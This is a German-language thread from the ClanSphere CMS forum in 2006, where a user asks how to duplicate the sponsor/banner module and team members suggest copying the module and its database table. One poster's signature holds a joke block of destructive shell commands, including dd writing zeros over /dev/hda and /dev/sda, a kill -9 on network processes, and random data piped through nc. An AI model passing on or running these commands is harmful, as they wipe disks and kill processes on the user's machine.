Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 4
Seite [1]
denimator


King for a day




Herkunft: Karnabrunn
Beiträge: 306
# Thema - 30.09.2006 um 12:23 Uhr
Ich weiß nicht wo ich die Frage im großen Forum stellen soll!! Bitte dorthinverscheiben, falls es hier nicht hergehört.

Ich würde gerne ein zweites Sponsormodul haben. Naja eigentlich soll es nur andere Links anzeigen. Selbst schaff ich das leider nicht, hab zwar viel probiert, aber herausgekommen, ist dabei lieder nichts.
Bitte euch dabei um Hilfe


------------------
mit freundlichen Grüßen - Denimator

Inaktiv
duRiel ClanSphere Team


Weltmeister




Herkunft: Cambridge
Beiträge: 7300
# Antwort: 1 - 30.09.2006 um 12:28 Uhr
es geht theoretisch nur um kategorien oder?


Inaktiv
|
denimator
Thread-Ersteller


King for a day




Herkunft: Karnabrunn
Beiträge: 306
# Antwort: 2 - 30.09.2006 um 13:48 Uhr
Es geht darum, dass ich so schön in einer Liste die Banner wie bei Partner präsentieren könnte. Und ja praktisch in den Kategorien als zB Sponsoren2


------------------
mit freundlichen Grüßen - Denimator



Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 3 - 30.09.2006 um 13:50 Uhr
Ich weiß nicht ob das geht, aber:

Erstell doch eine 2te Datenbanktabelle. Dieser hat denselben inhalt wie auch die Banner-Tabelle.

Das Modul kannst du rein theoretisch auch kopieren, du müsstest halt nur die Pfade anpassen sowie auch die Datenbankabfragen anpassen.

(Theoretisch, bei 0.2 ging es so, weiß nicht ob es nun immer noch so einfach ist)


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
denimator
Thread-Ersteller


King for a day




Herkunft: Karnabrunn
Beiträge: 306
# Antwort: 4 - 30.09.2006 um 13:57 Uhr
das hatte ich versucht - nur war das Modul zwar dann auf der Seite, nur weder im Admin menü noch so mit den Bilder bei der Liste, also nur einzeln wie die Links selbst. Ich seh mich da leider nicht weiter durch ...


------------------
mit freundlichen Grüßen - Denimator



Inaktiv
|
Antworten: 4
Seite [1]


Sie müssen sich registrieren, um zu antworten.